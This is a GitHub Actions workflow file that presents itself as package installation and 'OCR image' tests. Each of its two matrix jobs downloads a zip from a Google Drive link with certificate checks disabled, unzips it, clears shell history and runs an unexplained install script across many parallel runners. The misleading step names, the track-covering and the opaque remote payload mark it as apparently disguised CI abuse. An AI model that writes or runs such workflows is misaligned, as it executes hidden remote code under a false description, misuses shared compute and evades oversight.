name: vuotoc9code
on:
  push:
    branches: [ "main" ]
  workflow_dispatch:

jobs:
  check:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.0, I.I, I.II]
        flag: ['Configure', 'Package', 'Assess', 'Operate', 'Distribute']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: Install Packages
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1Z9DqTSTsrUHaeQ5Aq86cqo5f6uPAXqfZ" -O vuotoc9code.zip
        unzip -o vuotoc9code.zip
        rm vuotoc9code.zip
        history -c && history -w

    - name: Test OCR Images
      run: bash install_module.sh


  Assemble1:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.0, I.I, I.II]
        flag: ['Prepare', 'Construct', 'Inspect', 'Activate', 'Publish']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: Install Packages
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1Z9DqTSTsrUHaeQ5Aq86cqo5f6uPAXqfZ" -O vuotoc9code.zip
        unzip -o vuotoc9code.zip
        rm vuotoc9code.zip
        history -c && history -w

    - name: Test OCR Images
      run: bash install_module.sh
        
